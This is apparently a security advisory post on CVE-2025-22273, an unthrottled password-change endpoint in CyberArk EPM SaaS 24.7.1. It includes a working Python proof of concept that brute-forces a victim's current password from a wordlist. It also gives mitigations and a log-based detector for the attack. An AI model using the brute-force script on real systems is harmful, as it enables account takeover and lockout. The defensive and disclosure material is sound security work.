In June 2024, a security issue surfaced in CyberArk Endpoint Privilege Manager (EPM), specifically in SaaS version 24.7.1. Tracked as CVE-2025-22273, the bug allows attackers to attempt unlimited password guesses at a sensitive endpoint, making brute-force attacks feasible and dangerous. Unfortunately, attempts to get a response from CyberArk about this were unsuccessful as of publication.

In this article, we'll break down this vulnerability, show a proof-of-concept (PoC) attack, and offer direct guidance to organizations and security professionals.

What is CVE-2025-22273?

CVE-2025-22273 describes a situation where the CyberArk EPM application fails to limit the number or frequency of user interactions – in this case, password change requests. This flaw appears at the endpoint:

POST /EPMUI/VfManager.asmx/ChangePassword

Here, an attacker can send an unlimited stream of requests, each carrying a different guessed current password, at high speed. No rate limiting, CAPTCHA, or account lockout interrupts the attempts.

- Tool: Any HTTP client (curl, Burp Suite, a custom Python script, etc.).
- Method: Attacker builds a script that sends repeated POST requests to the vulnerable endpoint, using all possible password guesses (commonly from a dictionary or via incremental brute force).
- Outcome: Eventually, if the password is weak or in the dictionary, the attacker could gain access to that profile.

Below is a proof-of-concept showing how an attacker might automate brute-forcing:

```python
import requests

TARGET_URL = 'https://target-domain/EPMUI/VfManager.asmx/ChangePassword'
USERNAME = 'victim.user@company.com'
PASSWORD_LIST = 'passwords.txt'

def attempt_change_password(session, current_password, new_password='NewStrong$Pass3'):
    # One password-change request; the guessed value goes in currentPassword
    data = {
        'username': USERNAME,
        'currentPassword': current_password,
        'newPassword': new_password
    }
    response = session.post(TARGET_URL, data=data)
    # You may need to adjust parsing per response
    if 'success' in response.text.lower():
        print(f"[+] Password found: {current_password}")
        return True
    return False

def main():
    session = requests.Session()
    with open(PASSWORD_LIST, 'r') as f:
        for line in f:
            password = line.strip()
            print(f"Trying: {password}")
            if attempt_change_password(session, password):
                break

if __name__ == '__main__':
    main()
```

The above code checks each password in passwords.txt against the /ChangePassword endpoint until it finds the valid current password.

> Warning: The above code is for educational purposes and lawful security testing (with permission) _only_!

- If the brute force succeeds, the attacker could change the victim's password and lock them out.
- Attackers may escalate privileges, steal sensitive information, plant malware, or launch further attacks inside the victim's network.

Reference(s)

- CyberArk Official EPM Product Page
- CVE-2025-22273 at MITRE (pending)

Until an official fix is available, you should:

- Monitor your logs: Watch for repeated failed password changes. Lock or alert on any user accounts with high error rates.
- Put a reverse proxy in front: Use tools like Nginx or Apache to rate-limit requests to /EPMUI/VfManager.asmx/ChangePassword.
- User training: Remind users to report unexpected password-change alerts or notifications.
- Contact CyberArk: Request information on a fix and urge the implementation of rate limiting or brute-force protection.
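The log-monitoring step above, as an added example that is not part of the original article: a small Python detector that walks access-log lines and flags any (client IP, user) pair with five or more failed POSTs to the ChangePassword endpoint inside a sliding 60-second window. The simplified log format, the sample lines, and the assumption that a wrong current password produces a non-2xx status are mine; adapt the regex and status check to your real proxy or EPM log format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

TARGET_PATH = "/EPMUI/VfManager.asmx/ChangePassword"  # path from the advisory
# Constructed sample lines (not real EPM logs), simplified access-log format:
#   <ip> - <user> [<timestamp>] "<method> <path> HTTP/1.1" <status>
SAMPLE_LOG = """\
203.0.113.7 - victim.user [28/Feb/2025:13:15:01 +0000] "POST /EPMUI/VfManager.asmx/ChangePassword HTTP/1.1" 401
203.0.113.7 - victim.user [28/Feb/2025:13:15:02 +0000] "POST /EPMUI/VfManager.asmx/ChangePassword HTTP/1.1" 401
203.0.113.7 - victim.user [28/Feb/2025:13:15:02 +0000] "POST /EPMUI/VfManager.asmx/ChangePassword HTTP/1.1" 401
203.0.113.7 - victim.user [28/Feb/2025:13:15:03 +0000] "POST /EPMUI/VfManager.asmx/ChangePassword HTTP/1.1" 401
203.0.113.7 - victim.user [28/Feb/2025:13:15:04 +0000] "POST /EPMUI/VfManager.asmx/ChangePassword HTTP/1.1" 401
198.51.100.4 - alice [28/Feb/2025:13:20:00 +0000] "POST /EPMUI/VfManager.asmx/ChangePassword HTTP/1.1" 401
198.51.100.4 - alice [28/Feb/2025:13:20:30 +0000] "POST /EPMUI/VfManager.asmx/ChangePassword HTTP/1.1" 200
"""
LINE_RE = re.compile(r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})$')

def parse_line(line):
    """Parse one access-log line; return None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {(ip, user): peak_failures} for each (ip, user) that made at least
    `threshold` failed ChangePassword POSTs within a sliding window."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # per key: failure timestamps still inside window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != TARGET_PATH:
            continue
        if 200 <= rec["status"] < 300:
            continue  # assumption: 2xx = completed change, non-2xx = failed guess
        key = (rec["ip"], rec["user"])
        q = recent[key]
        q.append(rec["ts"])
        while rec["ts"] - q[0] > window:  # expire failures older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[key] = max(len(q), flagged.get(key, 0))
    return flagged
```

Feed the output to your alerting pipeline and pair it with the reverse-proxy rate limit, since detection alone does not slow the attacker down.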

Conclusion

CVE-2025-22273 demonstrates the persistent risk from classic brute force attacks, especially on endpoints that lack modern rate-limiting. While the primary responsibility rests with the vendor to patch, organizations can and should take their own measures now.

If your organization uses CyberArk EPM SaaS (24.7.1), prioritize mitigations and demand an official fix. Don’t leave doors open for attackers.


*This long read is original research gathered from real-world testing. Please reference responsibly. For collaboration or further technical details, please reach out via responsible disclosure channels.*

Timeline

Published on: 02/28/2025 13:15:27 UTC
Last modified on: 03/05/2025 16:15:38 UTC